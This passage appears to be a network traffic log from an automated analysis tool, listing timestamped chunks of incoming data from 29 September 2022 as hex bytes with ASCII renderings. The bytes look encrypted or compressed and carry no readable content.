                                                                                                                                                    2022-09-29 12:59:23 UTC34176INData Raw: 35 58 7f 8f f2 3f 8b 86 a7 3d 3b b4 90 bb b8 51 fd 87 b7 bb 81 cc 32 83 9a 70 af 40 ed f9 30 5b 70 f0 d1 c3 06 2d 6d 3f 1b e6 20 98 c4 e6 16 b5 f7 c5 84 af 13 a1 6c 03 26 32 dc 7f f1 ce eb 30 e2 37 94 fa 8d eb 8c 5f a7 41 9b f2 01 f4 d9 4d 6d be 16 7e 2c d0 4c 7e 95 a9 c4 5f 39 68 6c d1 7a 88 90 38 d6 6b ee a6 1e 44 7c c3 04 d4 4e f4 67 4f 4d f7 6f 4d 3a 5a d4 9d 04 9c 04 17 bc 46 ae 10 70 8d db 15 f3 80 8a 3b 4b ea b4 37 75 f8 d5 33 d7 38 5b 02 fe 76 dd 2f 5a b9 64 7a 72 5a 81 9f 67 d9 6f e1 73 31 49 e3 a2 4c 49 5d da 8e 44 ad 89 11 72 91 94 0d 1e a4 2f 58 64 e2 a6 3f 3d ae 75 d7 22 e4 e0 b5 fb 5f 55 c9 06 86 df 78 64 ee a1 48 9c 33 0a e0 a4 3e 32 56 11 c6 d3 24 01 1e 4a 68 11 20 27 18 8b 97 9e a6 7b 51 af db a9 79 9a 88 8d 8b 67 52 9e da 75 ee bf f6 be
                                                                                                                                                    Data Ascii: 5X?=;Q2p@0[p-m? l&207_AMm~,L~_9hlz8kD|NgOMoM:ZFp;K7u38[v/ZdzrZgos1ILI]Dr/Xd?=u"_UxdH3>2V$Jh '{QygRu
                                                                                                                                                    2022-09-29 12:59:23 UTC34192INData Raw: 7c d4 d7 45 67 16 35 7e 27 1e 7b 8e c9 80 ad d1 1e db 82 80 ac d6 2f 2a b6 2c a3 fd 38 3a 29 cf 32 36 a7 95 35 37 14 19 d1 d8 0d 5b a2 f3 f5 47 d5 37 30 03 07 c1 b4 e6 da 11 2e ab e7 e8 ee 0c 41 2c 8a 45 fd 03 88 86 7f 6b 0a 13 76 ec f5 3d d3 b6 a8 17 fc 92 09 b1 d8 19 1d a5 25 0e 65 25 d5 0e c2 45 87 49 de 68 2d c4 0e 53 31 46 da 13 79 29 49 43 16 26 b6 22 8d 5d 02 40 1e 36 96 45 3d f8 0d 35 57 fa 0e 2f 8f 8e e5 9f 9f c2 9b 3a 11 54 14 0e 75 e3 38 3a 7d fb 22 ee 8f fb f4 31 a6 f3 83 de 53 6a f9 9a cc 92 e6 c1 96 81 ca 55 a0 cd 4c 0e 73 d9 8c c8 11 dd a0 eb 1f 95 cf cc 2d 67 87 85 4b ad 36 04 aa 4d f2 e0 21 2b fd 2e 63 31 cb 38 5f 49 c4 00 36 85 2c b2 78 0f 92 97 b1 c7 ab b6 61 a9 80 6c 10 77 9b de ec 49 9e 8f 67 50 b2 19 97 dc 84 f9 03 68 34 45 a9 9c 92
                                                                                                                                                    Data Ascii: |Eg5~'{/*,8:)2657[G70.A,Ekv=%e%EIh-S1Fy)IC&"]@6E=5W/:Tu8:}"1SjULs-gK6M!+.c18_I6,xalwIgPh4E
                                                                                                                                                    2022-09-29 12:59:23 UTC34208INData Raw: c5 fd ca ae e4 44 fd 84 a1 e9 a4 34 1b eb 9a ae c4 d0 a2 78 f8 02 1c 35 e6 49 31 d5 ca 13 5b dc a5 d8 fe c8 c0 08 22 d9 76 e7 a9 51 f2 7a 8d 4c d3 dc 09 31 cc 78 35 8f ac 01 76 e0 9b c7 82 fc a0 af 75 3f 6f 1f b9 6c 79 4a 19 a4 03 7f a5 a3 5a 92 15 77 76 1c f8 d3 0c d3 99 e0 06 85 d3 35 bf 9a 72 0a 21 f2 d5 bc 15 a1 9f ef b0 ed fe 18 99 06 6b 98 3d a3 b6 e8 27 36 0d 0e ba 1e b1 0b 70 fc 79 3c fb 77 41 ec 83 fc 6e 28 c9 40 b4 db a6 67 10 98 8d 17 eb ce 76 08 ab 9b 29 e6 40 05 0f d2 cb 8e 46 2c e0 e9 04 f0 6d f1 70 82 d8 17 23 b4 1e f6 2e 35 cf 12 1f 16 e5 20 b4 6e 30 ab 64 db 37 66 26 0c 93 b8 ca ff 38 b8 c8 74 f7 8d 1f 72 c4 0c 46 aa 52 e4 33 88 97 31 b8 d6 f1 de c0 a1 7e a1 eb 87 8e 95 92 1b e9 7b c6 59 52 b4 d7 82 ee 84 2b cc 6a d8 c1 03 43 ef 27 b7 3f
                                                                                                                                                    Data Ascii: D4x5I1["vQzL1x5vu?olyJZwv5r!k='6py<wAn(@gv)@F,mp#.5 n0d7f&8trFR31~{YR+jC'?
                                                                                                                                                    2022-09-29 12:59:23 UTC34224INData Raw: ee 88 c4 df 66 51 e5 57 de 34 2e ab a1 d9 3e 94 9d 1a 21 3b 73 d3 4b 46 44 9b 7e b2 cd c9 ca 75 a5 34 17 db ea 95 29 b2 05 3d 87 8a 35 4f ef 06 0a 59 6d ea 4d c3 13 19 3f 51 2b 5a a6 78 27 20 04 e4 66 10 8d 2d 18 bd 47 c4 e8 57 99 e0 31 89 e0 13 0a cd 0c 8d 14 df 8f fe e9 df a7 d2 fd 3d b9 20 b4 0d cf c2 b7 dc da 07 0e 35 5d 1d 62 11 12 f1 f6 25 79 44 4d 41 89 b2 2b 3f 5d 80 c7 bd db 33 e7 84 63 c3 37 a7 44 71 de 9d 39 a9 e7 8c 64 d8 a8 11 45 02 3a ab 42 34 4e e4 88 f7 6d 40 9a c7 48 3d 34 1f 5e c5 72 41 d3 dc 7a be 4a 9a 04 22 ed c6 28 c9 50 26 78 f0 f6 d2 f9 4c a2 5b ac 97 92 95 c0 ba 79 89 3d f8 da 54 c9 7d c6 2a 20 b6 09 f8 52 4a c7 56 e9 3c 14 8a 56 07 60 38 c6 a4 95 17 ca 21 61 2a da db fe 0a 65 c7 fb 29 35 80 16 6a 9b e2 f7 43 5f 1c 82 3d 56 69 0f
                                                                                                                                                    Data Ascii: fQW4.>!;sKFD~u4)=5OYmM?Q+Zx' f-GW1= 5]b%yDMA+?]3c7Dq9dE:B4Nm@H=4^rAzJ"(P&xL[y=T}* RJV<V`8!a*e)5jC_=Vi
                                                                                                                                                    2022-09-29 12:59:23 UTC34240INData Raw: cf c3 01 c4 9f 2f 2c a1 6d 0d dd 8f 8a 69 38 d9 85 b1 00 dc 5b 7e 12 18 f9 f6 7f bc 41 a1 4d e8 50 e0 52 0d 79 9f 87 46 86 0d e2 8d ea aa 61 ea 92 7e f6 aa c6 20 d6 54 47 ad ac 47 47 d7 6e 80 86 1a 1c e3 f4 96 02 d3 71 be ea c3 c6 65 fb 43 b7 f6 6c 52 de a3 61 e5 62 e2 bd 73 d6 68 2a 1f 18 d7 7d 5d 0f 94 9e 5f b3 c4 2b f7 38 07 1b 58 28 9c 49 7b 20 61 00 bf 9f 8f 4c d7 c1 c2 a3 15 66 6c 58 ec 65 39 52 50 69 7c fb f2 70 5c 90 52 bc 43 f5 9a c9 a7 07 b3 3a bb 39 35 d6 f4 41 7f 38 ec 44 f2 49 1a a5 5d fb 5f 35 80 e0 a1 0e 9a 2a fa 16 25 8d c6 8e 95 99 36 65 4d a9 8b 9c f0 2e 88 32 6a 6e 3d 2c cf 74 0c d1 7c 8e 00 1b 4e 3b 17 2a 10 51 6e 23 71 99 5a e7 0d 9a a4 88 6c 93 da 65 40 77 d8 e6 a5 bc 52 92 ac 78 2f d1 db 6a b4 cb cb 68 b4 05 e4 2f f5 ae 0e b7 0d 0b
                                                                                                                                                    Data Ascii: /,mi8[~AMPRyFa~ TGGGnqeClRabsh*}]_+8X(I{ aLflXe9RPi|p\RC:95A8DI]_5*%6eM.2jn=,t|N;*Qn#qZle@wRx/jh/
                                                                                                                                                    2022-09-29 12:59:23 UTC34256INData Raw: 7a b3 0a 75 a5 93 8d d2 fd 35 4d 55 c1 06 75 7e 6a 17 ed d0 89 3e 4c 43 31 07 71 bc e9 67 e7 c8 26 7a 0b 30 e6 30 f1 8a b0 27 1e 0f 34 0b bf dc ca 60 b7 42 fa 1d 56 f8 3f f8 d6 b4 51 d1 34 0d 7b b5 39 db 5b 39 7c 28 2b 08 1a 86 6a 33 03 26 b0 5e 6d eb d1 2f c6 4f 4b 97 76 34 00 81 de 4f 28 50 99 ea 73 90 91 c7 8c cc 24 33 a4 1b 76 a5 d2 f2 6c 2a fc ad 1a 7b b1 b2 ca 78 75 d8 b9 d1 6c e0 9d f8 08 07 4b 32 fb bb d2 5b 4d d7 4a 69 60 35 07 7c e1 11 62 22 f5 fa bb 13 fe f9 9b c9 33 9d 4e c1 3e 53 75 0e f8 b9 25 c2 2a c7 2e 59 1b 58 c1 98 60 23 dc 9c 16 cb 01 fe ef f5 b8 2b 3b 62 af 60 c3 79 86 53 f2 28 2a e9 f1 33 aa a7 55 93 fd 95 e1 ac e1 dc 58 02 98 ea f2 ef e9 25 05 88 5f 75 38 f1 a5 94 53 df 59 54 14 2b 63 e4 4c b1 1e 80 47 65 70 04 9b aa 0a 70 b0 5f ba
                                                                                                                                                    Data Ascii: zu5MUu~j>LC1qg&z00'4`BV?Q4{9[9|(+j3&^m/OKv4O(Ps$3vl*{xulK2[MJi`5|b"3N>Su%*.YX`#+;b`yS(*3UX%_u8SYT+cLGepp_
                                                                                                                                                    2022-09-29 12:59:23 UTC34272INData Raw: 95 5d 1d 35 7b ca b3 22 14 fc 3e 35 b6 ef a7 39 82 01 3d 02 74 4d 2b d9 f6 a9 47 31 73 91 d8 f8 6e 69 e2 e9 f6 53 00 5c 58 52 26 c5 9e 4e 79 5f 75 c9 99 d1 ba a6 a4 38 52 2d cf 40 62 72 8e 48 8b a9 7b 95 bb 4f 6b 3b 66 36 49 e2 c3 b4 f2 9e 2f 5a 47 21 66 87 ad b7 f9 db 70 6e c0 1d 48 ed 96 2f c5 26 72 97 22 64 ce 8a a6 a4 f8 5d f3 d4 fa 16 f5 04 a1 34 40 4b ba 89 36 12 78 4c 59 66 51 34 29 db 4d a2 82 8f f3 45 4b a3 75 0d a5 eb dc 28 60 bb 95 84 9a 86 e8 11 89 2f b1 b6 29 a5 22 31 bb 79 b6 0b f4 a5 7d ae 85 ab 14 0f e9 95 aa 7f b0 17 d6 07 3c 69 99 f1 16 19 58 13 dd d2 98 c2 24 89 a1 6e b2 96 bd a3 b8 79 94 45 e9 eb 90 85 07 3a 4e 2d 55 3a bb 7a 52 8e 19 04 81 29 33 4a bd f2 a5 aa af eb ed 56 eb bc 9e 7d 30 95 69 d5 a8 e2 23 36 ce d3 29 59 dd 5e 76 2e 51
                                                                                                                                                    Data Ascii: ]5{">59=tM+G1sniS\XR&Ny_u8R-@brH{Ok;f6I/ZG!fpnH/&r"d]4@K6xLYfQ4)MEKu(`/)"1y}<iX$nyE:N-U:zR)3JV}0i#6)Y^v.Q
                                                                                                                                                    2022-09-29 12:59:23 UTC34288INData Raw: b8 a1 a7 f6 fa 57 5d ff 4d a5 8b 27 14 95 3d 23 ed 4d c0 1c 26 e3 a5 94 b6 85 7d ca 5b 3d b6 16 4f c3 98 13 23 42 54 cf 1f ab fe 06 86 be 32 2a 04 a2 a2 be 4d 43 93 ab 5d 1a e9 22 33 92 c0 be 05 0b 96 c1 c9 26 02 86 f4 34 6d 99 82 45 63 45 93 13 d3 e2 f4 fc 72 63 e4 75 1c ff 1c fe b2 24 02 0e b1 f6 49 1c ea 1c eb e7 2c 31 3c be 4c ea 06 06 0d fe 51 12 0f 54 c4 e8 a1 ff d4 94 8f 6f 6e 7e 4f 85 38 bf d3 75 61 d6 f2 ce 74 59 48 26 5d a7 be 0d 33 8d e2 c0 58 fd d3 66 e4 dd 93 2d 52 35 39 0d 69 70 bc 3b 31 b5 b6 6a 20 73 76 b2 89 28 5c 51 0c fb 5e da 98 2b b9 15 b3 df 1f 9c 8b 78 86 7c 32 80 1d 25 18 e5 f1 f8 d0 78 0c 5c 0f 93 db 99 78 b4 e9 1b 48 4f 1e 6c d4 ec c0 5c 94 13 54 f6 af 7b 64 79 fb ec 8e 6e 98 86 ea c1 f8 28 c1 9c 3e 81 e6 29 94 4c e2 e2 21 89 bf
                                                                                                                                                    Data Ascii: W]M'=#M&}[=O#BT2*MC]"3&4mEcErcu$I,1<LQTon~O8uatYH&]3Xf-R59ip;1j sv(\Q^+x|2%x\xHOl\T{dyn(>)L!
                                                                                                                                                    2022-09-29 12:59:23 UTC34304INData Raw: 25 d7 9c f4 fd 4e e4 83 9f f5 a5 ad bc 06 54 e6 a8 f0 59 ed 0f 87 20 4c 3a b0 66 91 8e 22 68 e3 4f 83 96 3e ac 65 a1 e2 79 e3 08 e8 cd d4 cd d2 e8 9d 14 4a 03 42 54 4b 16 42 da 80 db ba 70 6d f8 5c be ba 6e bf 64 8f bb 8c 1b bf 93 7e b8 e1 e5 94 36 b3 90 2c 6c fd 5c 27 7d f9 b9 4c 5d 77 ae 9d 92 99 de 64 0f 81 e4 b9 cd ea 89 30 4c ab 45 64 a3 15 f5 70 6f 30 78 58 61 50 09 81 6b e8 91 6b eb e7 ab 6d 32 cc a9 f0 3f 98 f4 34 67 14 7b 57 2e 7b ca 41 7c 78 ae 65 0f 20 49 02 27 a9 63 bd a8 17 d9 fa 7b aa 30 61 64 c0 4d f8 08 d3 2e a6 99 87 24 78 0d 73 49 7c 28 8d 89 55 20 63 12 cc 2c c8 fc a4 60 ee 3b bd 8c 5d 9a 42 80 03 4d ab 2d 40 0f db cc cf f8 af e7 db b4 a3 9a 01 28 37 b2 de df 15 ec e5 0d 74 89 8b 7f ed 79 3f 4c 7d 6d 1a 08 40 92 62 ad da e1 b6 32 92 9c
                                                                                                                                                    Data Ascii: %NTY L:f"hO>eyJBTKBpm\nd~6,l\'}L]wd0LEdpo0xXaPkkm2?4g{W.{A|xe I'c{0adM.$xsI|(U c,`;]BM-@(7ty?L}m@b2
                                                                                                                                                    2022-09-29 12:59:23 UTC34320INData Raw: db f5 50 8f 35 85 49 bb 74 e9 c9 8e d4 7e 68 eb bd dc 48 97 15 58 71 7e 6a 96 2e 79 c3 be b3 87 30 69 1a cc d5 b5 2f 0c 20 9a ed 4d c0 b6 24 81 49 b3 a2 00 e6 4a d0 f5 25 e9 19 14 44 b7 ed f9 1f 95 21 09 5a 27 6f d7 34 9d fe 6a de 42 6c 93 25 ff 6c ca e7 93 84 13 f5 6a 04 b6 c3 58 c7 58 a7 a1 1d 15 15 8f 9a 44 40 68 f4 58 61 77 14 4f 78 e9 19 72 e1 aa e7 05 4a 16 56 f3 1f b7 e2 96 0b 0d 3d 7e 1a 66 f9 56 f6 54 c3 de 41 c1 50 27 bd 89 72 8f 80 b3 a5 3d a4 e3 e6 bd 9c 19 14 ee 3e ad f2 02 81 0d e5 f2 3b f1 0c 78 12 c7 fe 8d e3 c2 e7 31 71 97 1b d1 81 49 7c 75 01 73 cf af a1 5b be fd 27 32 36 c4 75 27 7c f2 e7 c8 15 6b a7 42 98 41 13 52 39 8e ed 48 9d e9 d7 a7 37 c1 a6 eb 8b f6 97 9a 91 d1 af f9 fb 9d 0d 5b 43 44 af 40 60 ec 96 ad 03 d8 b5 0a 48 89 66 7f 73
                                                                                                                                                    Data Ascii: P5It~hHXq~j.y0i/ M$IJ%D!Z'o4jBl%ljXXD@hXawOxrJV=~fVTAP'r=>;x1qI|us['26u'|kBAR9H7[CD@`Hfs
                                                                                                                                                    2022-09-29 12:59:23 UTC34336INData Raw: 6f e8 78 12 fd 3d b2 87 b4 8f 77 e4 94 0a 3e 8f ca 6c af 0e b8 99 c5 24 7d 63 e6 e5 db e2 6e 6a 33 44 3b eb f6 b6 39 f2 40 08 a2 18 87 b8 ec 8b b6 c8 d9 f1 74 19 9b 07 6f 65 0d 67 ca f5 b0 37 76 06 f1 8d 3b 74 fb 14 aa e1 fc 90 9f 1a 52 27 c9 60 9b d2 c0 e2 0f 50 91 bb ff 29 52 b9 a6 7a 91 7f 30 a7 01 52 31 f8 55 e1 f3 99 4d f2 13 6f 33 b0 f3 87 56 82 ad b1 82 fa f3 46 aa 55 ca f7 b0 10 c4 2f 2a f0 28 ea a7 26 9e f1 0e 1b bb 26 20 da f2 6b ec ef 37 22 d4 e4 61 54 6a 60 40 d6 ab 5c 99 fd c7 bd 81 b7 36 a7 e3 8c 95 00 7a 51 89 ba 58 60 f0 85 b6 4a 3d 17 c3 8f fc e8 f9 6c 3c 27 d8 1b 58 83 db 74 d0 ca 9d 74 92 a7 7b 83 79 d6 bf 58 32 1e 95 51 f7 36 ab fd 86 86 85 db 1f ea b1 ee 9e 62 0f 7d f3 04 25 00 83 70 a0 50 bf 1f 1a a7 b7 1d 65 6c b2 73 dd c4 a2 f1 a2
                                                                                                                                                    Data Ascii: ox=w>l$}cnj3D;9@toeg7v;tR'`P)Rz0R1UMo3VFU/*(&& k7"aTj`@\6zQX`J=l<'Xtt{yX2Q6b}%pPels
                                                                                                                                                    2022-09-29 12:59:23 UTC34352INData Raw: 18 fe 30 69 d3 1b a4 d8 75 79 f5 4a ff 04 f4 57 59 82 9c 4c 81 d6 da 7f a1 f6 93 e4 c4 ca 99 cf 9d 58 8e 36 03 0f a5 06 ab a1 9d a0 51 cf 85 36 39 0f f3 db 95 8f ce c4 e3 c1 3e dd 7a 12 6d 77 ef dd b6 44 d7 41 30 9e 7d 3a d8 4c 4e bd d4 81 bc df fb fb 19 cf b6 19 ab 48 57 37 9a b8 bd fa c0 96 bf e0 f6 62 b0 db ff ae 5b 73 3f 94 ba 8d 7d 63 a6 1f 0d 43 7c 96 ae c5 25 3a d5 c2 6e 0e dc 71 77 d9 6f b0 bc f6 1d a0 62 35 88 2d 97 3f 54 76 54 a8 71 08 86 a6 bb 5f e4 49 57 b8 1c 27 c0 36 9d f6 ad 84 53 16 d9 0f b1 40 bc 71 08 ef 5e 2c 97 30 df 9c c5 0b 89 44 4a 79 dc 07 1c ac 04 ab 57 ef f5 a6 12 88 7a 0f 7a 20 f4 24 ad 5b 1c 04 ed 49 8c de 2f 83 28 0a c8 cf 59 56 f4 51 d7 88 67 d9 76 df d3 56 77 8c e7 43 39 c0 f9 a8 e6 71 47 3d 2d b8 93 26 1e bb c7 cf 0f da f7
                                                                                                                                                    Data Ascii: 0iuyJWYLX6Q69>zmwDA0}:LNHW7b[s?}cC|%:nqwob5-?TvTq_IW'6S@q^,0DJyWzz $[I/(YVQgvVwC9qG=-&
                                                                                                                                                    2022-09-29 12:59:23 UTC34368INData Raw: 6b 7d ef be ba a8 b0 76 bb e1 92 b4 b4 6f 65 c9 de 3b 1f f8 a1 54 73 23 1a e0 c7 fd 96 59 52 7e ec e3 cb 1a a6 b5 46 88 14 28 dd f2 bb e6 b1 08 f8 6b dc 3e 43 30 3b 25 c9 f8 d5 59 94 28 33 ab 8a 51 cc bd 8d 66 45 08 e2 a2 c0 b9 14 0b 55 10 74 27 bd 1a be 7d c7 b8 20 62 1a 47 1c dd 5c 32 e4 ef 63 be 7d bf 05 33 6f d7 ec ef de 3e fd 09 09 02 1a 55 b1 3f 2b b7 a7 a2 ca c6 5f 8e 5e 23 c2 19 d7 16 d6 81 ea b5 dc 8c 75 a0 1d 79 4e c9 87 f9 ad 80 ac 7d 8a ce bf 76 8c ab 07 f0 17 9c 88 2a 26 18 09 14 9a 0c 13 61 5c 27 b9 4d 95 bd 0a 90 b9 81 35 ca 26 5d bc 6f e9 a0 7a c3 63 42 ef 23 b5 29 4c 34 fa 15 47 29 56 3a 99 b5 cb 35 a7 05 b8 bd dc 55 30 ca 4f 3d 1d 4e 0a 75 86 dc 74 31 20 f3 d9 47 38 05 0f 5d 4e 6e 9a 9b 08 35 62 35 95 1f c6 eb 03 c8 ce 84 95 54 5e 87 dc
                                                                                                                                                    Data Ascii: k}voe;Ts#YR~F(k>C0;%Y(3QfEUt'} bG\2c}3o>U?+_^#uyN}v*&a\'M5&]ozcB#)L4G)V:5U0O=Nut1 G8]Nn5b5T^
                                                                                                                                                    2022-09-29 12:59:23 UTC34384INData Raw: 6d 7c e8 0a ba 04 07 26 ab 71 fe 5e be f3 f5 61 72 e1 20 6f eb ec 22 d8 71 28 39 27 48 bc 68 1a 85 0a d3 0c 35 30 1e c2 0c 2f 12 7c b6 21 66 02 d8 9e 58 4a c0 f9 a5 c8 41 a4 c3 3d 74 e9 32 54 30 0e 69 64 61 e7 57 07 4c b0 8e b3 ec c4 46 bc f1 b7 05 b4 fc 43 19 ed 1b d1 72 bb 5c 33 f9 35 eb 91 2a 14 e0 6e 5f 37 70 f9 0a d7 52 f2 7c 3c 86 f7 75 c5 b0 b2 67 c2 b8 cb 42 74 65 46 f1 ec 76 3b 8a 11 58 8e 0f bf 41 0b 01 ce 44 e5 03 d5 2f d1 ef 1c 4a 16 b0 01 ad d9 6c 88 62 9c de 20 3f 82 d9 73 e0 c4 55 c2 60 00 c8 18 c0 95 c1 2e 96 e1 72 19 fb f7 c2 bb 09 7b 5e 68 28 6b 71 c9 9a 19 42 93 ea 29 59 91 c7 77 39 91 74 17 2c d7 11 6a 3f fc 47 77 7b 89 2d a9 e6 93 3b 58 e2 c5 f6 5a 7d 1a 43 a4 04 24 84 c0 3f b0 eb 7f ee 23 9e 59 5e 22 c0 09 b4 49 3d 94 c0 e8 ef 6e c7
                                                                                                                                                    Data Ascii: m|&q^ar o"q(9'Hh50/|!fXJA=t2T0idaWLFCr\35*n_7pR|<ugBteFv;XAD/Jlb ?sU`.r{^h(kqB)Yw9t,j?Gw{-;XZ}C$?#Y^"I=n
                                                                                                                                                    2022-09-29 12:59:23 UTC34400INData Raw: 55 12 de fb ab 25 5c 36 d0 00 30 31 36 eb 96 84 0d 91 4d 9c e6 ac 43 b0 a5 5d 84 ec 1e 53 09 ed 7d 9c ef 95 eb 75 cb 6b d8 7d 5b 10 b1 aa a7 5b 97 c5 65 02 86 1c ba c6 2d 7f 15 76 50 d7 76 ab 57 72 39 4a fc 52 be 21 74 66 8e 03 42 22 44 c9 95 da 99 e6 f3 c8 a3 fc 5c e3 2a de 51 a9 8c 22 e0 81 c4 af dd 4f db a2 3c 91 3d 05 5b 32 c5 4a b7 91 74 40 b1 5f 9c 1c a9 e9 3a d6 50 c5 a1 c9 27 e8 0b a5 f7 a5 94 e5 73 1e 5b 2d b2 c7 aa 80 a7 f4 6c 95 11 b1 55 82 af 0f 4b 1a 6e 2e fe 0d db 10 01 9c f4 ae b5 e5 f0 07 fb 19 09 9b 66 02 dc 98 1f a3 c8 88 d9 1c 38 0a 4e ad b1 ee 38 08 e8 2d c5 87 03 e6 40 5b f8 87 73 be 27 89 1c b8 23 ec d5 bb 89 77 9b 8c d7 db e1 2d ce e1 42 cf 6b 80 15 a8 ee 75 72 12 79 84 2f 2d e7 f9 a7 61 48 32 64 19 9c bb 91 81 80 0b ea cd 98 d8 d0
                                                                                                                                                    Data Ascii: U%\6016MC]S}uk}[[e-vPvWr9JR!tfB"D\*Q"O<=[2Jt@_:P's[-lUKn.f8N8-@[s'#w-Bkury/-aH2d
                                                                                                                                                    2022-09-29 12:59:23 UTC34416INData Raw: ea 83 cf 66 a8 9a 1c 47 91 7f e3 4d a7 22 cb b5 80 59 58 b0 9b 60 f9 a6 40 f7 d9 58 1a 21 69 f9 e1 c1 65 cc 08 1e 02 f4 09 f6 93 4c b7 58 95 a5 63 a0 0f 67 e1 f1 f8 0e 56 30 78 a4 e6 dc 3b a2 02 af c6 6a 70 aa cf 71 30 c3 d8 2a 4a 25 09 d2 f5 dc 69 46 c8 4d 13 37 a5 9b ee fb 39 27 58 2c 14 c0 61 2e a8 32 d0 42 21 3c 0a ab 20 aa b2 ef 34 aa 6b 80 2c c5 30 e7 9c ac 41 33 9a c2 88 f2 ec 14 d9 61 42 fc c4 32 91 d0 b6 36 d9 01 0e cf 1a b6 5d 59 5f b9 f8 79 0b 9f 7f 55 cb 3b 5b fb a7 09 96 36 92 64 3e 10 65 c7 da e1 3c 33 1a 0e 9d 3f 2b 4a e8 ad 24 b0 1a a8 17 ce ed 7a 5e b5 a6 f5 76 4e d1 6f 9e f8 07 08 6d b4 a1 f7 cc d6 17 82 3b 82 39 f0 d8 2f bb d8 b5 f3 af 1a 9b f3 ed fe be 67 a2 c7 b2 5d 2d d3 f9 87 99 82 8c 1e df 20 c7 a5 89 aa 31 43 85 9d ae 2d 79 66 36
                                                                                                                                                    Data Ascii: fGM"YX`@X!ieLXcgV0x;jpq0*J%iFM79'X,a.2B!< 4k,0A3aB26]Y_yU;[6d>e<3?+J$z^vNom;9/g]- 1C-yf6
                                                                                                                                                    2022-09-29 12:59:23 UTC34432INData Raw: 91 8b 23 ef 09 75 e0 ac cf cc 92 79 0b 1c 12 c8 9b e1 2a 65 17 5a 5b a5 89 a0 5c f3 32 b8 64 90 ae ef e3 63 1a 2a 6c fc f7 e5 a1 4d 96 d7 0a a6 ce 03 78 05 6e eb c2 df f8 25 cf 35 5b e1 8f 0d fa 9b 4b 6c c2 15 21 a0 44 51 aa e6 d6 34 6d 23 bb dc 71 f1 3a 25 cd 13 98 75 11 cf 1e b9 5c 45 58 95 13 c5 a6 e7 7e af b3 3f b0 91 99 0d 3a d7 b2 0d ed fc 63 2e 78 e0 43 e2 ea 88 34 5f 71 15 7d 52 7c 8d 1f 4a f7 0a 4a 2b 82 b2 c1 f0 b7 18 d6 a9 a6 78 76 02 a4 cb 7f 19 e2 b6 b3 14 f4 aa f8 68 0c 2c 78 4c 1a 94 af 3d df 27 e7 1d 58 b1 0f cb 4d 99 73 a7 ea 69 05 19 0c ed 06 68 1c d6 a8 44 c2 f9 b2 61 77 a2 84 50 e0 ca 64 66 18 54 5d 57 41 b8 7f b9 c8 48 39 d8 4d 83 35 cd 17 c4 38 f4 dd 0a d8 63 85 f4 a0 1f c5 65 78 94 c1 eb e5 86 5f f2 a9 7d 68 6b bd d5 8d 72 51 de 26
                                                                                                                                                    Data Ascii: #uy*eZ[\2dc*lMxn%5[Kl!DQ4m#q:%u\EX~?:c.xC4_q}R|JJ+xvh,xL='XMsihDawPdfT]WAH9M58cex_}hkrQ&
                                                                                                                                                    2022-09-29 12:59:23 UTC34448INData Raw: 86 5a 6d 0d c6 fd 7c 82 27 c2 98 82 f0 70 29 82 bb 61 6c d7 d7 73 41 b4 88 bb c6 6b 82 a7 08 aa 09 cd 6a 08 a2 65 d9 dd 96 29 44 9b 00 78 2b 8b 4b 9f 5e e0 b7 c2 36 a1 77 d5 3a 05 a2 af 70 96 6e 47 0a 52 c5 79 5c c3 4c 6b 62 c1 6d 20 2d 01 f7 32 0b 6a 39 fb 14 f6 89 92 24 29 08 68 e9 f4 67 65 48 93 6b 61 a3 65 0b 01 f2 05 ec 8b 43 b1 c5 0c 0b 73 1d 4f 21 03 ed ce af 8f c8 7c 75 cc 3e fb e7 ce a6 63 e3 2b f9 c5 12 75 50 52 9a 18 e9 95 88 e6 55 ec 55 30 cc 7d 78 e7 e7 33 ea da 7b a3 59 1a e4 ac 6f 47 99 28 e3 32 62 5d ed 89 a9 16 10 33 41 7b 12 a0 56 2d 5d 1e c4 ba 99 f1 69 72 56 5f a3 7b 87 0c 83 36 78 eb 14 e9 ca ff 1c 67 5e 25 0d 70 d7 81 01 ac 0b f8 87 28 de 26 40 8d c7 3b 71 0e 14 34 3a 91 c5 07 4d 58 9e 2d f7 45 90 92 24 75 07 97 74 6f 24 09 ed f6 08
                                                                                                                                                    Data Ascii: Zm|'p)alsAkje)Dx+K^6w:pnGRy\Lkbm -2j9$)hgeHkaeCsO!|u>c+uPRUU0}x3{YoG(2b]3A{V-]irV_{6xg^%p(&@;q4:MX-E$uto$
                                                                                                                                                    2022-09-29 12:59:23 UTC34464INData Raw: db ee ec 3d 85 ec 9e 7c 55 06 de 67 ff f7 42 3d 53 64 41 f9 5f b4 23 ba 49 4d a5 67 8a c7 72 eb 44 05 21 af c3 13 63 17 78 9e e9 7d fb 33 38 24 99 b1 f9 43 5a 26 31 39 e7 fe 49 9a 80 31 d4 4a c2 fb ec 9f 4e 95 bb 4b b1 e9 2d d5 7e c2 fd 06 46 6b bf 11 f0 3d 77 03 f4 43 de 93 c6 f3 44 b6 34 ac a2 c1 4e 26 bf c0 30 48 5c c5 32 7c 4d 9a e3 22 a5 8e 42 c7 c6 25 96 c8 12 f9 99 79 78 9f 2c 5e f8 c8 98 f8 0b 32 57 fc da 2b c5 96 a7 30 67 e4 03 6d 22 6b c4 93 2a 58 62 cb 4a 25 56 71 ab e1 0b cd a3 be 23 cb 6f c7 f0 76 63 fb 96 a2 1c ac 32 b2 b1 98 08 28 6a ac 15 29 a7 47 fb 83 ee 10 68 25 46 aa 96 9d 0b bd c0 39 7e 2e e4 a5 cf f5 11 65 74 d0 26 36 d0 84 29 d2 9c b0 b7 41 c6 d0 51 b5 97 31 39 05 e6 f4 2b 5b 4c 9a 58 05 a8 3d 7f af a6 57 30 6d 34 63 fa dc 3e 6e e8
                                                                                                                                                    Data Ascii: =|UgB=SdA_#IMgrD!cx}38$CZ&19I1JNK-~Fk=wCD4N&0H\2|M"B%yx,^2W+0gm"k*XbJ%Vq#ovc2(j)Gh%F9~.et&6)AQ19+[LX=W0m4c>n
